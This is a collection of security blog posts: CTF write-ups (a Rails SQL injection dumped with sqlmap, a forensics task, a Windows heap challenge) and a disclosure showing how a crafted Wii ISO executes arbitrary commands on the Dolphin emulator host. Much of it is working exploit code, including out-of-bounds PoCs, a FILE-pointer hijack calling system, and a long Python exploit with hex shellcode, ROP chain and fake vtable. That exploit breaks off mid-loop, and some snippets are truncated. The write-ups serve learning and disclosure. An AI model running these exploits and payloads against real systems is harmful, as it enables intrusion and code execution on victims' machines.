So now I just needed to get string data in memory. However the code was reading from user input it didn’t allow spaces, so the command “type flag.txt” wasn’t going to work. I discovered that “type,flag.txt” could work, and proceeded to foolishly load it into the stack frame of main, and pass a pointer to it to system. This doesn’t work, because we’ve already returned from main, so system‘s stack frame corrupted its own argument. The only other things on the stack I could easily control were doubles, but they were only 8 bytes long. In the end I packed the command “type f*” into a double and it worked. Yay!

The somewhat abbreviated, although no less terrible, code:

```def get_nested_thing(image_base, stack_leak):
dwords = [
15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15,
15, 15, 15,
image_base + 0x3055,
stack_leak - 36,
struct.unpack('I', 'type')[0],
struct.unpack('I', ' f*\0')[0],
15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15]
values = []
for i in range(0, len(dwords), 2):
values.append(repr(struct.unpack('d',
struct.pack('II', dwords[i], dwords[i+1]))[0]))
global values_index
values_index = 0
def next_value():
global values_index
v = values[values_index]
values_index += 1
return v
def nested(x):
if x == 0:
return next_value()+'+'+next_value()
return next_value()+'+(' + nested(x-1) + ')'
return nested(15)

send('new\n')
send(128*'000+' +  '(0+0)\n')
send('run\n')
leak = read_until(': still running.')[:-len(': still running.')]
leak = leak[:len(leak)-len(leak)%4]

values = struct.unpack('I' * (len(leak)/4), leak)
text_leak = values[12]
assert (text_leak & 0xFFFF) == 0x3483
image_base = text_leak - 0x13483

send('new\n')
raw_input('press enter:')
send('0+'*126 + get_nested_thing(image_base, values[15]) + '\n')
while 1:
if 'runtime error' in read_until('Operation: '): break
send('run\n')

send('new\n')
send('.type,flag.txt\n')
send('quit\n')

# derailed (Web, 300)

Derailed was a Ruby on Rails web challenge in the form of a note taking app. I registered an account, logged in, and the first thing I noticed viewing source was that images were embedded using base64 URLs, which seemed a bit odd. The next thing I noticed was that these images came from URLs in the markdown, so the code:

`![derailed](http://derailed.hackable.software//derailed.png)`

would appear as a base64 encoded image. I tried file:/// URLs, which didn’t work. I tried to get it to send an HTTP request to a server I controlled, which did work, but didn’t lead anywhere. I considered setting up FTP or SMB servers to see if it would send me credentials (which was a solution to a CTF challenge I failed to complete many years ago), but didn’t. Eventually I tried just /etc/passwd which worked.

The passwd file listed the home directory of the derailed user, and I found an example rails app on GitHub and used that to guess some URLs and pull down some of the source files.

I also found the rails secret key in /proc/self/environ and used that to make sessions impersonating other users in the hopes that a key was stored as user zero or one. In hindsight I should have seen that this was a dead end, but after successfully writing a ruby script to make fraudulent cookies, and iterating over every possible user I didn’t find the key, just lots of other contestants notes.

I went to dinner, and tried to think of alternate approaches to suggest to my team mates, or paths we hadn’t searched yet. I figured I had some time to kill, so I tried auditing for other bugs and stumbled upon this code:

```def index
@notes = current_user.notes.order(order)
end
def order
order = params[:order]
if order =~ /^(created_at|updated_at|title)\$/
order
else
'created_at'
end
end```

I’m really not familiar with Ruby, but I knew that using regex for validation isn’t foolproof, and I’d done SQL injection through an ORM at my day job years ago, so I tried bypassing it by appending “%0a” to the parameter, which worked. I still wasn’t sure if it was injectable, but I figured out that “%0a-” would crash but “%0a–” wouldn’t, and assumed it truly was SQL injection.

I had a nice dinner with friends.

On the train ride home I got back to it, this time using sqlmap (I’m lazy, and it’s pretty good). It was a tricky injection, so I figured out how to do blind queries myself, then specified the injection point manually:

```sqlmap.py -u 'http://derailed.hackable.software/notes?order=
created_at%0a,%20updated_at%20limit%20(select
%20count(*)%20from%20users%20where%201=1*)'

As you can see I initially didn’t escape the ‘*’ in count(*) causing some injection point confusion, but after that (and a ton of other fiddling with random options I didn’t really understand) I got it to recognise the blind AND based injection.

On the train ride home I got it to dump the table names and column names and asked it to dump the most interesting one:

```Database: public
Table: fl4g
[1 entry]
+---------+
| F1A6    |
+---------+```

But it just gave up because of 500 errors, and I had to get off the train and walk home. On my walk I reasoned that it might be because the column name looks like hexadecimal, and if I could only quote it it might work. When I got home I verified this (using the extremely verbose setting on sqlmap to get the URLs and modify them by hand), and wrote a tamper script to do it for me (surprisingly easily):

```from lib.core.enums import PRIORITY
return retVal```

I wrote just over half of one of those lines, the rest are from the manual/template. The final flags were “–dbms=postgres –dump -T fl4g -D public –threads=4 –tamper=quote” (because I called my script quote.py). And it gave me the flag.

# INDEX (Forensics, 400)

I wasn’t going to write this up. No offence to the creator, but I just really like pwning a lot more than sifting through haystacks. I wasted hours trying to find tools to parse the filesystem and dump the metadata, specifically the catalog, because of the cryptic poem:

```I'm a collector and I've always been misunderstood
I like the things that people always seem to overlook
I gather up and catalog it in a book I wrote
There's so much now that I forget if I don't make a note```

I started reading the HFS specification, and an HFS parser espes had written.

In the end, I pieced together the two parts of a Mach-O by looking at where they started and stopped in a hex editor. I loaded it in IDA and read the code. I found the XOR key, and knew exactly what file was meant by inode 19 due to all the previous investigations and dodgy tools I’d installed in virtual machines. I XOR’d the right bytes with the other right bytes and got the key.

# Exploiting Dolphin – Part 1

Dolphin is a Wii emulator, and a consistent source of interesting technical problems. In the interests of learning more about Dolphin, Wii, PowerPC, and exploitation, I discovered a handful of bugs, and created an ISO file that can run arbitrary code on the host, portably and reliably. This has been an interest of mine since I spent some time exploiting a partial GameCube emulator in the last Defcon CTF finals, and I decided to actually explore it following a tweet from a Dolphin developer.

To be clear, Dolphin is not a sandbox, and is not designed to be secure. You should not use it to emulate software from untrusted sources. Piracy is a very good way to get yourself hacked. If you run something in Dolphin you should understand that it can do anything on your computer. These bugs will be fixed, but there will be plenty of other bugs in the future.

These issues are not “vulnerabilities”, it’s just a collection of interesting tricks that allow games running on Dolphin to execute arbitrary code. I do call it “exploitation”, because the same techniques can work on software which actually has security requirements.

Anyway, enough disclaimers, let’s dig in. In Part 1, I’ll show how to make a 100% reliable exploit for Dolphin on macOS, which is portable to every version containing a single, simple bug.

# Wii IOS IPC HLE

Enough three-letter initialisms? Let’s start with some definitions. (I’ve included links to the WiiBrew wiki, which was a valuable source.)

IOS is the operating system that the Wii provides to games running on it. It runs on a separate ARM coprocessor in the Wii. This provides a variety of services, for example allowing games to read and write files, and communicate over the network.

IPC stands for inter-processor communication, and is the means by which the PowerPC processor running the game code communicates with IOS. This is implemented using a number of memory-mapped I/O registers.

HLE stands for high-level emulation. Instead of requiring a copy of IOS to be fully emulated, Dolphin provides high-level (C++) implementations of all the functionality that IOS usually provides to games.

This provides a considerable attack surface, and is where I began my search for interesting bugs. After a little exploring, I came across the following code (abbreviated):

```CWII_IPC_HLE_Device_sdio_slot0::IOCtl(u32 _CommandAddress)
{
switch (Cmd)
{
{

if (reg >= 0x200)
{
break;
}

u32 val = m_Registers[reg];
INFO_LOG(WII_IPC_SD, "IOCTL_READHCR 0x%08x - 0x%08x", reg, val);

Memory::Write_U32(val, BufferOut);
}
break;
// ...
}
// ...
}```

This code looks great, it’s bounds checked and everything. The catch, of course, is in the definition:

```class CWII_IPC_HLE_Device_sdio_slot0 : public IWII_IPC_HLE_Device
{
// ...
u32 m_Status;
u32 m_BlockLength;
u32 m_BusWidth;

u32 m_Registers[0x200 / 4];

File::IOFile m_Card;
// ...
};```

The classic byte/word mixup allows reading from anywhere up to index 511 in a 128 element array. Better still, there’s a IOCTL_WRITEHCR implemented in the same method with the same bug, allowing memory corruption. (To my surprise, this bug was introduced by respected exploit writer comex in September 2013.)

It took me a lot of work to create an ISO file that reproduce this bug, using only Python, PyCrypto, and a PowerPC toolchain, and I learned a lot of interesting lessons. But after thoroughly reinventing a number of wheels, the proof-of-concept was only a few lines:

```  int slot0 = open("/dev/sdio/slot0", MODE_RW);

// overwrite the low 32-bits of the File::IOFile
u32 input[5] = {129, 0, 0, 0, 0x41414141};
ioctl(fd, IOCTL_WRITEHCR, &input, sizeof input, 0, 0);

// crash by attempting to read from the File::IOFile
u8 out[8];

# ASLR in Dolphin

Dolphin avoids randomised addresses in several places for a variety of reasons. In recent versions, the binary is loaded at a fixed location below 0x80000000 (2GB) so that certain x86 instructions emitted by the JIT can access it. The drawback of using this memory is that it can change significantly every time the program is recompiled or the source changes. But this technique is very useful if we know the exact version we’re exploiting and don’t need to be portable.

Also on macOS and Linux, the virtual memory of the emulated console is mapped at a fixed address (0x2300000000). This is part of the “fastmem” optimisation, where Dolphin uses a 16GB range of the 64-bit address space to represent memory in the same layout as is seen by the 32-bit processor in the Wii. (This is an oversimplification, but it’s close enough for our purposes.)

```#ifdef _WIN32
// 64 bit
u8* base = (u8*)VirtualAlloc(0, 0x400000000, MEM_RESERVE, PAGE_READWRITE);
VirtualFree(base, 0, MEM_RELEASE);
return base;
#else
// Very precarious - mmap cannot return an error when trying to map already used pages.
// This makes the Windows approach above unusable on Linux, so we will simply pray...
return reinterpret_cast<u8*>(0x2300000000ULL);
#endif```

This is nice and predictable for attacks which required arbitrary data at a known location. On Windows there’s no deliberate randomisation, but it’s not 100% predictable (due to some other factors), so we can’t write a 100% reliable exploit this way.

Even with full ASLR, the bug described in the previous section allows us to leak some data from the heap, potentially bypassing ASLR. But for now I’ll focus on using the fastmem region at 0x2300000000 to exploit macOS.

# Corrupting an IOFile

Now we have two options, corrupt the following member of the structure (the IOFile), or corrupt the following heap data. There’s a lot more heap data to chose from, but as the CWII_IPC_HLE_Device_sdio_slot0 class is allocated only once during initialisation, we don’t have much control over the following data, and it will be different on different platforms, and change randomly on some platforms, so the IOFile is a much more appealing option.

It has only has two members we can corrupt:

```class IOFile : public NonCopyable
{
public:
// ...
std::FILE* m_file;
bool m_good;
};```

It turns out there’s exactly one pointer we can overwrite. At first glance this seems hard to exploit, but it turns out that the FILE structure is responsible for managing input and output buffers, and is extremely amenable to building an arbitrary memory read/write primitive.

Let’s take a look at how the IOFile is used by slot0 (abbreviated again):

```u32 CWII_IPC_HLE_Device_sdio_slot0::ExecuteCommand(u32 _BufferIn, u32 _BufferInSize,
u32 _rwBuffer, u32 _rwBufferSize,
u32 _BufferOut, u32 _BufferOutSize)
{
// The game will send us a SendCMD with this information. To be able to read and write
// to a file we need to prepare a 0x10 byte output buffer as response.
u32 ret = RET_OK;
switch (req.command)
{
// ...
{
if (m_Card)
{
u32 size = req.bsize * req.blocks;
if (!m_Card.Seek(req.arg, SEEK_SET))
ERROR_LOG(WII_IPC_SD, "Seek failed WTF");
{
DEBUG_LOG(WII_IPC_SD, "Outbuffer size %i got %i", _rwBufferSize, size);
}
else
{
ERROR_LOG(WII_IPC_SD, "Read Failed - error: %i, eof: %i",
ferror(m_Card.GetHandle()), feof(m_Card.GetHandle()));
ret = RET_FAIL;
}
}
}
Memory::Write_U32(0x900, _BufferOut);
break;
}
// ...
}```

The Seek and ReadBytes translate pretty much directly to fread and fseek, which are part of the C standard library, implemented by Libc on macOS. You can download the source from opensource.apple.com.

The FILE structure is pretty complicated, but there are a few things to note. First, there are function pointers, which we could use to get control of RIP. However, we don’t know any fixed address that’s safe to call, so we must also note the flags, which we can use to prevent the function pointers from being used, while constructing an arbitrary read.

The following is the (again abbreviated) structure definition:

```typedef struct __sFILE {
unsigned char *_p; /* current position in (some) buffer */
int _r; /* read space left for getc() */
int _w; /* write space left for putc() */
short _flags; /* flags, below; this FILE is free if 0 */
short _file; /* fileno, if Unix descriptor, else -1 */
struct __sbuf _bf; /* the buffer (at least 1 byte, if !NULL) */

/* operations */
int (*_close)(void *);
int (*_read) (void *, char *, int);
fpos_t (*_seek) (void *, fpos_t, int);
int (*_write)(void *, const char *, int);

/* separate buffer for long sequences of ungetc() */
struct __sFILEX *_extra; /* additions to FILE to not break ABI */
fpos_t _offset; /* current lseek offset (see WARNING) */
} FILE;

#define __SRD 0x0004 /* OK to read */
#define __SWR 0x0008 /* OK to write */
#define __SRW 0x0010 /* open for reading & writing */
#define __SOPT 0x0400 /* do fseek() optimisation */
#define __SOFF 0x1000 /* set iff _offset is in fact correct */```

Let’s perform an arbitrary read. First, we need to make sure we hit the “fseek() optimisation” path that doesn’t call the _seek function pointer, and then have enough data available in the buffer that it doesn’t need to call the _read function pointer. We can do this as follows:

• Set the __SOPT and __SOFF flags to avoid calling seek.
• Set the _seek function pointer to non-NULL to allow seeking.
• Set the __SRD flag to allow reading.
• Make the _offset and _r fields are greater than the read size.
• Make the _p and _bf._base fields point to the source location for the read.
• The _extra pointer must point to valid memory, for the lock.

All in all the function ends up looking like this:

```static void slot0_osx_read(int fd, void *out, u64 hostaddr, u32 size) {
osx_FILE file;
memset(&file, 0, sizeof file);

osx_FILEX extra;
memset(&extra, 0, sizeof extra);

file._flags = OSX_SOPT | OSX_SOFF | OSX_SRD;
file._seek = 1; // non-null

file._offset = size + 1;
file._r = size + 1;

// replace the FILE* to point to our data

// restore
slot0_write_fileptr(fd, saved_fileptr);
}```

There’s an interesting problem of endian that I haven’t mentioned. Because the PowerPC architecture our code is running on is big-endian, and the x86 architecture Dolphin is running on is little-endian, we need to swap every field in the structure. I borrowed a trick from LLVM, which uses C++ operator overloading to transparently do endian conversions, so the code above is correct – it’s just that the fields are declared as host_u32 and host_ptr types in the structure definition, not int and unsigned char * as in the Libc source code.

# Finding System

We’ll finish the exploit by calling system, but first we have to find it. system is a function in libc, so we can start by finding libc. Fortunately, we know where the original FILE object is (because we can leak it using the out of bounds read), and so we can read out the pointers to the true implementation of the _read function, which is within Libc.

We can then search backwards from this point to find the Mach-O header (marked by the magic number 0xFEEDFACF at the start of a page). And finally, we just need to do exactly what dyld does, parse the Mach-O header, find the export trie and lookup the string _system. Fortunately you can find the source at opensource.apple.com, which makes things a bit easier, but it still takes quite a lot of code.

The implementation is shown in the code linked below.

# Running code

Now we just need to call system. We’ve gone to great lengths to avoid calling _seek, but it’s actually a really good technique, because _seek is called with _cookie as the first argument:

`ret = (*fp->_seek)(fp->_cookie, offset, whence);`

So now we know where system is, we can invoke it with an arbitrary string as follows:

```file._cookie = address_to_host("open -a Calculator");
file._seek = system_ptr;
file._flags = 0;
slot0_write_fileptr(slot0, saved_fileptr);```

When Dolphin attempts the read, it will call system and the shell command will run.

After all this the runtime is stable, so it could easily be patched into a pirated game. (Don’t pirate software, even emulated software. With Dolphin, and most other emulators, you’d be taking exactly the same risk as pirating native games, which is just a terrible idea.)

# Final Notes

This exploit works on Dolphin 3.5-2313 through to Dolphin 5.0-1296 on OS X (I didn’t test them all, but a pretty representative sample). It hopefully illustrates how carefully choosing corruption targets and techniques can lead to very reliable and portable exploits.

There are a lot of things I didn’t cover, but I hope it gave some insight into Dolphin, and macOS’s C library implementation.

The full code for the macOS exploit is on gist.github.com – if you have any questions, let me know. The hard part is arguably setting up the build environment and generating a Wii disc, but there are plenty of other resources that can help with that.

The patches for the other bugs I disclosed are in PR #4447. Thanks to JosJuice for fixing the bugs quickly.

In Part 2, I’ll explain how to exploit this on Windows, turn the FILE* overwrite into an arbitrary write as well, and look at another information-leak bug.

# Def Con Quals 2016 – Easier [Pwnable]

Easier has the dubious honor of being the most frustrating CTF challenge I have completed to date. It was the second hardest challenge in the CTF, according to the dynamic scoring system LegitBS used. (And the hardest problem that my team, 9447, solved.)

The challenge presented a fairly opaque interface, sending the user four random numbers on start up, and accepting four numbers in return. I reversed this pretty extensively in IDA and WinDbg, figuring out that it was performing modular exponentiation and finding all the parameters, only to figure out that the result is completely ignored as long as all your response values are greater than 1 (otherwise it exits).

So, a lot of time wasted, but now we get to it reading more input. It would read two numbers from the user perform a cryptographic-looking operation on them. I reversed this to the following C code:

```    void do_input(unsigned *buffer, unsigned count) {
for (unsigned i = 0; i < count; i++) {
scanf("%ux",&buf[i]);
}
unsigned lookup[4] = {1, 2, 3, 4};
for (unsigned i = 0; i < count; i += 2) {
unsigned value = 0x7CBF26C0;
unsigned v1 = buffer[i];
unsigned v2 = buffer[i+1];
for (unsigned j = 0; j < 64; j++) {
v2 -= (value + lookup[(value >> 11) & 3]) ^
(v1 + ((v1 << 4) ^ (v1 >> 5)));
value += 0x160D0365;
v1 -= (value + lookup[value         & 3]) ^
(v2 + ((v2 << 4) ^ (v2 >> 5)));
}
buffer[i] = v1;
buffer[i+1] = v2;
}
}
```

I tried to transcribe this to z3 to find the inverse, painstakingly debugged an issue where using v2>>5 instead of LShR(v2,5) caused z3 to hang indefinitely, and I could finally send commands! My first successful use of z3 in a CTF!

As soon as I started reversing the commands, however, I immediately found that command number 2 called a function that performed the inverse operation all along. I transcribed that C code to Python, hung my head in shame, and moved on with the challenge.

To explain the commands, I will annotate the source LegitBS kindly release on GitHub (DefconChal2.cpp, I will however note that lines 91 to 93 are definitely not in the binary (and might have made things a lot easier).

In the end I used commands 1, 2, and 5 to write the exploit. But the seemingly endless collection of useless or painfully hard to use bugs is worth noting (starting with the “does-nothing” crypto initialization).

```  // allocates room for 128 buffers, even though bufferPointer is
// limited to 63 (this makes a reference to bufferPointer*2 in
// command 8 safe, though)
uint32_t **buffers = (uint32_t **)halloc(512);
uint32_t bufferPointer = 0;
while (1) {
uint32_t buf[2] = {0};
int newSize;
newSize = buf[1];
uint32_t *toUse;
if (bufferPointer > 63) {
exit(-1);
}
switch (buf[0]) {
case 1:
// newSize is signed, so we could allocate -4 if we wanted,
// or smaller numbers to get a possibly-interesting NULL
// pointer dereference. Of course, this would "scanf" pretty
// much indefinitely.
if (newSize < 2048) {
toUse = (uint32_t *)halloc(newSize + 4);
} else {
exit(-1);
}
toUse[0] = buf[1];
buffers[bufferPointer++] = toUse;
break;
case 2:
// Send back the buffer
if (buf[1] < 64 && buffers[buf[1]] != 0) {
writen(&(buffers[buf[1]][1]), buffers[buf[1]][0] / 4, agreeKey);
}
break;
case 3:
// Free a buffer
if (buf[1] < 64 && buffers[buf[1]] != 0) {
hfree(buffers[buf[1]]);
buffers[buf[1]] = 0;
} else {
exit(-1);
}
break;
case 4: {
// This looks like it leaks the address of ntdll, but "hm += 4" adds
// 4 * sizeof (HMODULE*) = 16 bytes, so it corrupts the heap. It
// also doesn't store the new allocation in the "buffers" array, so
// it's useless.
HMODULE *hm = (HMODULE *)halloc(sizeof(HMODULE) + 4);
*(uint32_t *)hm = (uint32_t)sizeof(HMODULE);
hm += 4;
} break;
case 5: {
// This is the only crazy one I could use. "b1" can be buffer 0 (the
// first buffer allocated), or buffer 64 (see command 8?)
int b1 = buf[1] & 64;
int b2 = (buf[1] >> 8) & 63; // any buffer 0 through 63
if (buffers[b1] == NULL || buffers[b2] == NULL) {
exit(-1);
}

// copy using the length from b1
memcpy(&buffers[b1][1], &buffers[b2][1], buffers[b1][0]);

// Set the length of b1 to the length of b2, potentially growing the
// buffer. This has a lot of advantages.
buffers[b1][0] = buffers[b2][0];

// Free the second buffer without removing it from the list (so you
// could double-free it, use the free list pointers as buffer length,
// etc.)
hfree(buffers[b2]);
break;
}
case 6:
{
// This looks like a nice arbitrary read, because it doesn't check
// the bounds of "buffers". Except there's no way to get the
// result - it just leaves it on the stack. And it calls
// "readn(..., 1, ...)" which uses the uninitialized memory in
// offset[1] which makes the chosen index basically random.
uint32_t offset[2];
uint32_t *myBuf = buffers[buf[1]];
char toEnc[8] = {0};
if (offset[0] < myBuf[0] / 4) {
sprintf(toEnc, "%08x\n", myBuf[offset[0] + 1]);
}

} break;
case 7: {
// This looks like a nice arbitrary write, but again, it uses
// readn(..., 1, ...), twice. Maybe z3 could have solved the second
// one, but the local values seemed to contain random stack
// addresses when I tried it.
uint32_t offset[2];
uint32_t *myBuf = buffers[buf[1]];
if (offset[0] < myBuf[0] / 4) {
}
} break;
case 8: {
// This makes the same mistake as case 4 of adding
// 4*sizeof(SYSTEM_INFO) and even worse, stores the wrong pointer
// into the buffers array (where it could be freed - the bugs are
// endless). It also uses bufferPointer*2 as the index, which is
// interesting because it's the only way we could write to
// buffers[64] (which we can access in command 5). (As noted above,
// the array is big enough that this isn't out-of-bounds.)
uint32_t *val;
LPSYSTEM_INFO lpinfo = (LPSYSTEM_INFO)halloc(sizeof(SYSTEM_INFO)+4);
val = (uint32_t *)lpinfo;
lpinfo += 4;
val[0] = sizeof(SYSTEM_INFO);
GetSystemInfo(lpinfo);
buffers[bufferPointer * 2] = (uint32_t *)lpinfo;
bufferPointer++;
} break;
default:
exit(-1);
break;
}
}```

Okay, so I trust you read cases 1, 2, and 5. The first trick I found was to leak a lot of heap memory. This works (at a guess) by using the free list pointer to read out of bounds:

```send_pair(1, 3)  # allocate a buffer with zero items
send_pair(6, 0)  # free the buffer, without removing it from the list
send_pair(2, 0)  # read the buffer```

(At this point it’s worth noting another bug: in the “read the buffer” command, the first two DWORDs are encoded, and every subsequent DWORD is transmitted as it. Useless, but confusing.)

This would dump a large amount of heap memory, then crash. I used WinDbg’s !heap command to try to understand, and I think this is because the allocation landed in an LFH region in the heap somewhere early on. It was useful because this leaked out some recognisable pointers into the binary, making it possible to figure out the remote ASLR slide. (It’s worth mentioning that Windows pretty much only randomizes module addresses once per boot, so the location of the binary was the same every time I connected to the same server).

The bug I planned to exploit was in command 5, which can grow the buffer. This gives you an arbitrary out-of-bounds heap read and write:

```send_pair(1, 3)            # allocate a buffer with zero items
send_pair(1, 2040)         # allocate a buffer with 2040 items
send_sequence([0] * 2040)
send_pair(6, 1 << 8)       # set the length of the first buffer to 2040
send_pair(2, 0)            # read the buffer
send_pair(1, 2040)         # allocate a new buffer with 2040 items
send_sequence([0x41414141] * 2040)
send_pair(6, 2 << 8)       # copy the data to the buffer this time
```

Now, my master plan was to allocate the first buffer immediately before “buffers” array on the heap and control it. I had an EC2 instance set up to try to replicate the conditions and I tried a few different allocation sizes and eventually got this working. Nice!

Fortunately, I had to foresight to try to reproduce this result on the remote server. It didn’t work. I still don’t know why.

However, I did notice a new pointer into the binary that I hadn’t seen before when I used an allocation size of 24. This was a pointer to a vtable, which IDA recognised as that of “std::locale::_Locimp”, some part of the statically linked C++ runtime code. Unfortunately, I couldn’t see this locally, but as it was my only lead, I decided to try exploiting it remotely, with no way to debug it.

But how could I make a fake vtable? I needed to figure out the address of my data on the heap. Item zero gave a read-write size of 2040, but if I allocated another buffer after it (in the randomized LFH), I could modify its length to be an arbitrary value, leaking enough of the heap to reveal the buffers array. From here, I could find one of my buffers that contained a vtable. I filled a buffer with the pointer to the following gadget:

``` .text:00401850 push offset a08x08x08x08x ; "%08x %08x %08x %08x\n"
.text:00401855 call printf```

And then changed the vtable pointer to point to it. Nothing happened. Then I sent an invalid free command and suddenly it printed the four hex values! The first one printed was the return address, which I figured out was inside an _atexit handler. I had eip control!

From here, painstaking step by painstaking step I wrote my ROP chain without a debugger. One interesting note is the pivot I used:

` les esp, ptr [eax] ; pop esi ; pop ebp ; ret`

Not being familiar with the les instruction(“Load Far Pointer”) I had assumed it loaded a pointer from the es segment. This was a mistake (and a very tricky mistake to debug blindly). It turns out it loads a 48-bit pointer from memory, with the high 16 bits going into the es segment register. I found the value of es on my Windows test server, and corrected my fake vtable to be:

``` vtable = [
0x2B,              # value for the "es" segment
slide(0x00405b04), # les esp, ptr [eax] ; pop esi ; pop ebp ; ret
]```

From here, I used my ROP chain to call the “writen” function and dump out the address of functions in kernel32 (from easier’s imports). I then called VirtualAlloc to protect some shellcode and returned into it.

Victory, right?

Nope, just to add to the frustration, I couldn’t manage to open the flag file. I tried using WinExec to run commands (I don’t think I got any output). I tried using CreateFileA, and debugged it using GetLastError and printf (I was initially passing the wrong arguments). I eventually called GetProcAddress(LoadLibraryA(“msvcrt”), “system”) and managed to run commands. echo hello worked, but dir and type flag.txt both output Access denied. I ran GetCurrentDirectoryA(…) and printed the result, and eventually figured out the winning command to pass to system:

`type "C:\Users\Administrator\Desktop\Defcon Chal\key.txt"`

Was this necessary? In hindsight I imagine not, but it was what finally worked.

Many thanks to LegitBS for the most incredibly frustrating challenge I have ever done. I hate thing2 too 🙂

The slightly-cleaned-up code is below. Note that it contains a few hardcoded addresses, which were found using different ROP chains or shellcodes.

```import socket
import struct
import random
import string
import time
import sys

shellcode = '648b250400000081ec00020000e83a000000747970652022433a5c55736572735c41646d696e6973747261746f725c4465736b746f705c446566636f6e204368616c5c6b65792e7478742200be30b71b75ffd6be5018eb00ffe6'.decode('hex')

# align to 8 bytes
while len(shellcode) % 8: shellcode += '\0'
shellcode_dwords = [struct.unpack_from('I', shellcode, i)[0] for i in range(0, len(shellcode), 4)]

# usual boilerplate

VERBOSE = False
sock = None
buf = sock.recv(1)
if not buf:
raise EOFError
return buf

s = ''.join(read_byte() for i in range(n))
if VERBOSE:
print '<', `s`
return s

s = ''
while not s.endswith(sentinel):
if VERBOSE:
sys.stdout.write(b)
sys.stdout.flush()
s += b
return s

def send(s):
if VERBOSE:
print '>', `s`
sock.sendall(s)

# specific code
U32 = 0xFFFFFFFF
def encode(v1, v2):
value = 0
lookup = [1,2,3,4]
for i in range(64):
v1 = (v1 + ((value + lookup[value & 3]) ^ (v2 + ((v2 << 4) ^ (v2 >> 5))))) & U32
value -= 0x160D0365;
v2 = (v2 + ((value + lookup[(value >> 11) & 3]) ^ (v1 + ((v1 << 4) ^ (v1 >> 5))))) & U32
return v1, v2

def decode(v1, v2):
value = 0x7CBF26C0
lookup = [1,2,3,4]
for i in range(64):
v2 = (v2 - ((value + lookup[(value >> 11) & 3]) ^ (v1 + ((v1 << 4) ^ (v1 >> 5))))) & U32
value += 0x160D0365
v1 = (v1 - ((value + lookup[value         & 3]) ^ (v2 + ((v2 << 4) ^ (v2 >> 5))))) & U32
return v1, v2

def send_pair(v1, v2):
v1, v2 = encode(v1, v2)
send(str(v1) + 'x ' + str(v2) + 'x\n')

def send_sequence(l):
l = l[:]
n = len(l) & 1
if n:
l.append(0)
for i in range(0, len(l), 2):
l[i], l[i+1] = encode(l[i], l[i+1])
if n:
l = l[:-1]
send(' '.join('%dx' % i for i in l) + '\n')

def allocate_item(size, data):
send_pair(1, size)
send_sequence(data)

send_pair(2, item)
r = [int(i,16) for i in read_until('\n').split()]
if len(r) >= 2:
r[0], r[1] = decode(r[0], r[1])
return r

def free_item(item):
send_pair(3, item)

def operation_5(zero_or_40, src_idx):
send_pair(5, zero_or_40 | (src_idx << 8))

def try_to_win():
global VERBOSE
global sock

# do the pointless handshake
send('4 5 6 7\n')

# this size allocates in an LHF block preceeding the vtable on the remote
# server
size = 24
current_item = 0
allocate_item(size, [2] * (size/4)); current_item += 1

# allocate the largest item we can
grow_item = current_item
allocate_item(2040, [2] * (2040/4)); current_item += 1

# allocate more items in the same LFH block, so we can grow one of them
# to leak even more heap memory
for i in range(19):
allocate_item(24, [0x12345678,current_item,0,0,0,0]); current_item += 1

# copy 24 bytes to our first allocation, and set its size to 2040
operation_5(0, grow_item)

# read out the 2040 bytes

# try to find the vtable
vtable_index = None

for i, v in enumerate(original):
if (v & 0xFFFF) == 0xc134:
image_base = v - 0x1c134
print hex(image_base)
vtable_index = i
print 'found vtable at offset', i
break
else:
# just retry
print 'no vtable! :('
return False

# try to find one of our other buffers
for i, v in enumerate(original):
if i + 1 < len(original) and v == 0x12345678:
leak_item_index = i-1
leak_item_id = original[i+1]
print 'found item', original[i+1], 'at index', leak_item_index
break
else:
print 'no item'
return False

# grow our leak item so we can read 9KB of heap memory
update = original[:]
update[leak_item_index] = 0x2400

# we write to our 2040 byte window by allocating a new item
# and doing operation 5 again. this copies 2040 bytes.
update_item = current_item
allocate_item(2040, update); current_item += 1

operation_5(0, update_item)

# leak 9KB of memory for the first time.
# this should include the array of pointers to our buffers, which will
# allow us to find the address of our buffers and construct complex data.
print ' '.join('%x' % i for i in leak_1)

# allocate the shellcode
allocate_item(len(shellcode_dwords)*4, shellcode_dwords); current_item += 1

# find the pointer to the shellcode by leaking 9KB again, and looking at
# the changes made to the memory

for i, (a,b) in enumerate(zip(leak_1, leak_2)):
if i == 0 or i == len(leak_1) - 1: continue
if leak_1[i-1] != 0 and leak_2[i-1] != 0 and a == 0 and b != 0 and leak_1[i+1] == 0 and leak_2[i+1] == 0:
print 'index is', hex(i)
break
else:
return False

# generate our rop chain, using the shellcode address

def slide(x):
return x - 0x400000 + image_base

definitely_printf_4 = slide( 0x401850 )

# (unused) function for dumping memory
# I used this, combined with some "pop" gadgets to dump the import
# pointers and find the kernel32 base address.
write_function = slide( 0x40F13A )

# just a ret instruction
rop_nop = slide( 0x40F21B )

# This could be calculated at the time, but once-per-boot ASLR is too
# convenient not to take advantage of.
kernel32_base = 0x770e0000

virutalalloc = 0x6B818B90-0x6B810000+kernel32_base

rop_chain = [
# make some room for the stack, so it won't corrupt the heap
rop_nop, # esi
rop_nop, # ebp
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
virutalalloc,
len(shellcode),
0x1000,
0x40,
]

# allocate the rop chain
while len(rop_chain) < (0x100/4):
rop_chain.append(rop_nop)
assert len(rop_chain) == (0x100/4)

allocate_item(0x100, rop_chain); current_item += 1

# find the rop chain as before

for i, (a,b) in enumerate(zip(leak_2, leak_3)):
if i == 0 or i == len(leak_2) - 1: continue
if leak_2[i-1] != 0 and leak_3[i-1] != 0 and a == 0 and b != 0 and leak_2[i+1] == 0 and leak_3[i+1] == 0:
print 'index is', hex(i)
my_rop_chain = leak_3[i] + 4
print 'my_rop_chain @ ' + hex(my_rop_chain)
break
else:
print 'couldnt find my_rop_chain'
return False

# create the vtable, using the pointer to the rop chain
vtable = [
my_rop_chain,
0x2B,               # value for the "es" segment
slide(0x00405b04),  # les esp, ptr [eax] ; pop esi ; pop ebp ; ret
]

while len(vtable) < (0x40/4):
vtable.append(0)
assert len(vtable) == (0x40/4)

# allocate the vtable
allocate_item(0x40, vtable); current_item += 1

# find the vtable as before

for i, (a,b) in enumerate(zip(leak_3, leak_4)):
